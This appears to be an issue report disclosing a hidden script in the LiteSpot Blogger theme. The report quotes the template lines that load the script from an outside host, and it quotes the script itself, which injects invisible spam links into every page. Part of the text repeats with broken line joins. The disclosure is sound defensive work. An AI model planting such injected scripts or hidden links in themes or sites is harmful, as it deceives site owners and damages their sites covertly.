I found a hidden malicious script in the Litespot theme:
https://ljii.github.io/m/m.js
let EFV='<div style="position:absolute;z-index:-999;top:-500px;"><a href="https://mrjaz.com">MrJaz</a><a href="https://sohanisharma.com">sohanisharma</a></div>';document.querySelector("header")?document.querySelector("header").insertAdjacentHTML("beforeend",EFV):document.body.insertAdjacentHTML("beforeend",EFV);It injects hidden spam links (MrJaz, sohanisharma) into the site and could harm users’ SEO.
Location:
File: LiteSpot-Premium-Blogger-Template.xml
</b:if><b:tag name='script' src='//ljii.github.io/m/m.js'/><b:if cond='data:view.isArchive'>
</b:if><b:tag name='script' src='//ljii.github.io/m/m.js'/><b:if cond='data:view.isArchive'>
Steps to reproduce:
- Install theme on Blogger
- Inspect source code / header
- Observe hidden spam links injected
This is a serious security concern. Please review and remove it to protect other users.
I found a hidden malicious script in the Litespot theme:
https://ljii.github.io/m/m.js
It injects hidden spam links (
MrJaz,sohanisharma) into the site and could harm users’ SEO.Location:
File:
LiteSpot-Premium-Blogger-Template.xmlSteps to reproduce:
This is a serious security concern. Please review and remove it to protect other users.